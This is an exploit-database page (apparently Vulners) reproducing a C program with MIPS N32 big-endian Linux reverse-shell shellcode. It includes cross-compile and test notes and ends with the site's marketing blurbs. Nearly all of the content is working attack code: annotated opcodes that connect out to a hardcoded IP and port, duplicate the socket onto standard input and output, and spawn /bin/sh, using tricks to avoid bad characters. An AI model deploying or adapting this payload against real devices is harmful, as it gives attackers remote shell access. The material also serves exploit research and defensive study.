Vulners
Lucene search
Linux/MIPS - N32 MSB Reverse Shell Shellcode
/*
* mips_n32_msb_linux_revsh.c - MIPS N32 MSB Linux reverse
* Copyright (c) 2022 Marco Ivaldi <[email protected]>
*
* Basic MIPS N32 MSB Linux reverse shellcode, showcasing various
* techniques to avoid badchars.
*
* Cross-compile (https://buildroot.org/) with:
* $ mips64-linux-gcc -static mips_n32_msb_linux_revsh.c -o revsh
*
* Tested on Linux MIPS64 Cavium Octeon III. I placed the shellcode on the
* stack, because on my test device the .data section was not executable.
*
* Based on https://youtu.be/0-_Wtz5L9ZY by Evan Walls at tacnetsol.com.
*/
void main()
{
char sc[] =
// sub technique
"\x24\x0d\xff\xfa" // li $t1, -6
"\x01\xa0\x68\x27" // nor $t1, $zero # 5
// sock = socket(2, 2, 0)
"\x25\xa4\xff\xfd" // addiu $a0, $t1, -3 # 2
"\x25\xa5\xff\xfd" // addiu $a1, $t1, -3 # 2
"\x25\xa6\xff\xfb" // addiu $a2, $t1, -5 # 0
"\x24\x02\x17\x98" // li $v0, 0x1798 # socket (0x1798)
"\x01\x01\x01\x0c" // syscall 0x40404
"\x24\x50\x10\x10" // addiu $s0, $v0, 0x1010 # sock + 0x1010
// xor technique
"\x24\x0e\x21\x21" // li $t2, 0x2121
// connect(sock, {2, 0x5ac2, 0x5db8d822}, 16)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x39\xcc\x21\x23" // xori $t0, $t2, 0x2123 # 2
"\xa7\xac\xff\xec" // sh $t0, -20($sp)
"\x24\x0c\x5a\xc2" // li $t0, 0x5ac2 # 23234 << XXX port
"\xa7\xac\xff\xee" // sh $t0, -18($sp)
"\x24\x0c\x5d\xb8" // li $t0, 0x5db8 # 93.184 << XXX ip1
"\xa7\xac\xff\xf0" // sh $t0, -16($sp)
"\x34\x0c\xd8\x22" // li $t0, 0xd822 # 216.34 << XXX ip2
"\xa7\xac\xff\xf2" // sh $t0, -14($sp)
"\x27\xa5\xff\xec" // addiu $a1, $sp, -20
"\x39\xc6\x21\x31" // xori $a2, $t2, 0x2131 # 16
"\x24\x02\x17\x99" // li $v0, 0x1799 # connect (0x1799)
"\x01\x01\x01\x0c" // .byte 0x01, 0x01, 0x01, 0x0c # syscall
// add overflow technique
"\x24\x0f\x7f\x7f" // li $t3, 0x7f7f
// dup2(sock, 0)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x81" // addiu $a1, $t3, 0x8081 # 0
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// dup2(sock, 1)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x82" // addiu $a1, $t3, 0x8082 # 1
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// dup2(sock, 2)
"\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock
"\x25\xe5\x80\x83" // addiu $a1, $t3, 0x8083 # 2
"\x24\x02\x17\x90" // dup2 (0x1790)
"\x01\x01\x01\x0c" // syscall 0x40404
// execve("/bin/sh", ["/bin/sh"], 0)
"\x3c\x0c\x2f\x62" // lui $t0, 0x2f62 # "/b"
"\x25\x8c\x69\x6e" // addiu $t0, 0x696e # "in"
"\xaf\xac\xff\xec" // sw $t0, -20($sp)
"\x3c\x0c\x2f\x73" // lui $t0, 0x2f73 # "/s"
"\x25\x8c\x68\x68" // addiu $t0, 0x6868 # "hh"
"\xaf\xac\xff\xf0" // sw $t0, -16($sp)
"\xa3\xa0\xff\xf3" // sb $zero, -13($sp) # NUL
"\x27\xa4\xff\xec" // addiu $a0, $sp, -20
"\xaf\xa4\xff\xf8" // sw $a0, -8($sp)
"\xaf\xa0\xff\xfc" // sw $zero, -4($sp)
"\x27\xa5\xff\xf8" // addiu $a1, $sp, -8
"\x28\x06\xff\xff" // slti $a2, $zero, -1 # 0 (slti technique)
"\x24\x02\x17\xa9" // li $v0, 0x17a9 # execve (0x17a9)
"\x01\x01\x01\x0c"; // syscall 0x40404
void (*f)() = (void *)sc;
f();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Feb 2022 00:00Current